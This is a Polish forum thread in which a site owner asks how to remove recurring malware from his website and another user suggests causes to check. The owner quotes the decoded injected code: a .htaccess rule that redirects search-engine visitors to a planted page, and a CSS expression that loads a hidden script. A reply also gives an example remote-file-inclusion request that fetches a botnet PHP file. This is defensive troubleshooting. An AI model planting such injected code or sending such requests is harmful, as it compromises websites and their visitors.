Mam wirusa na WWW, jak się go pozbyć, Jakiś malware-gen, proszę o pomoc Opcje

[Tomplus]

Witam,

Prowadzę stronę www.swos.pl
Ostatnio walczę z wirusem malware-gen, o którym informuje AVAST i to nie jest problem który wyjasnianiają w tym wątku http://prvforum.prv.pl/viewtopic.php?t=15553

tutaj jest fota z antywirusa


Oczywiscie mój anti nie wykrywa go, jednakze to nie znaczy ze go nie ma.

Wirus jest specyficzny bo bez naruszenia daty dodaje kod:

do plików .htaccess, do wszystkich jakie znajduje na I i II poziomie roota

CODE

# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail
gogo|poisk|alltheweb|f ireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_wo
d|buscar|text|words|su|q t|rdata)\=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_wo
d|buscar|text|words|su|q t|rdata)\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /swospl/gfx/arutab/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c

oraz analogicznie tylko do plików arkusza stylów CSS kod

CODE

/*0b4df006e02184c60dbf503e71c87ad */
body {
margin-top: expression(eval(unescape('if (!document.getElementById('JSSS')){
JSS1 = 59; JSS2 = 157763;
JSS3 = '/swospl/gfx/arutab/dummy.htm';
var js = document.createElement('script');
js.setAttribute('src', '/swospl/gfx/arutab/check.js');
js.setAttribute('id', 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) };
'))) }
/* a995d2cc661fa72452472e9554b5520c */

to powyższe jest z dekodowane, bo inaczej człowiek by nic nie odczytał.
Po nitce do kłębka znalazłem nie proszony katalog ARUTAB i usunąłem.


W tym roku poraz 3 pojawia się ten katalog i nie wiadomo dlaczego zmienia style css i .htaccess
strona ogólnie nie zmienia się nic, a nic wszystko działa jak należy, ale .... nie podoba mi się taki nie proszony gosć i skąd się wziął.

Dostęp do konta mają tylko 2 osoby. Po poprzedniej takim incydencie skasowałem pliki js i sprawdziłem wszystkie pliki
kasując w css i ht szkoliwy kod i skontrolowałem pliki js i php na całym serwerze.
Nic nie znalazłem.
Jednakże dzisiaj pojawił się ponowanie i znowu musiałem sprzątać.

Będę wdzięczny za rozwiązanie.

- prawdopodobne rozwiązanie jest w http://forums.devshed.com/apache-developme...y-512348-2.html
jednakże zupełnie nie rozumie dyskusji, w większości przekracza moje kompetencje językowe.

[Firez]

Hmm a przeglądałeś logi? Jeśli ataki są dokonywane poprzez jakieś błędy w skrypcie strony lub poprzez jakiś ukryty 'backdoor' w php powinieneś znaleźć w logach podejrzane wpisy. Jeśli nie znajdziesz niczego w logach podejrzewałbym oprogramowanie ftp z którego korzystasz [ostatnio słyszałem o przypadkach klientów ftp z podejrzanego źródła z 'feature' wysyłającym dane logowania na konto email hackera] lub keylogger. Jeśli to żadna z tych rzeczy możliwe, że winne jest oprogramowanie serwera bądź czynnik ludzki [tzn druga osoba która ma dostęp do konta].

PS. Tutaj są opisane podobne ataki - http://www.google.pl/search?hl=pl&clie...=Szukaj&lr=
PS2. Tak dla pewności pytam - zmieniałeś hasło ftp po atakach?
PS3. W logach szukaj wpisów podobnych do takiego:
/index.php?get=http://www.freewebs.com/haddem/botnetphp.txt
[próba wczytania kodu php z innego serwera poprzez podanie adresu pliku w zmiennej get]

Ten post edytował Firez 28.03.2008, 00:31:26

[Tomplus]

Nie mam dostępu do logów, bo konto jest na zewnętrznym serwerze, ale nie free.

Wlasnie pliki znowu się pojawiły, w tym samym katalogu i tym samym dodał się do css i htaccess nie proszony kod.

Kody usunąłem, a katalog w którym się pojawia zablokowałem ustawiajac chmod 000.
Prawdopodobnie stary kod strony, który kilka lat temu stworzył drugi właściciel konta, ma dziurę którą mi przedstawiłeś.

Zmieniłem hasło, teraz i wcześniej.
Jednak przypuszczam to pierwsze, bo gdyby cracker miał dostęp do FTP to umieściłby jakieś nie ciekawe pliki/zdjęcia, które zaczęłyby mi obciążać transfer.
A na tą chwilę dysk zwiększał się tylko o kilkanaście kilob co było spowodowane przez mnogość plików css i .htaccess na serwerze.

Co ciekawe pliki zostały zmieniane tylko w publicznych katalogach, a tych "nie publicznych" - smieciarkach - gdzie równiez sa te pliki - nic nie zostało zmieniane.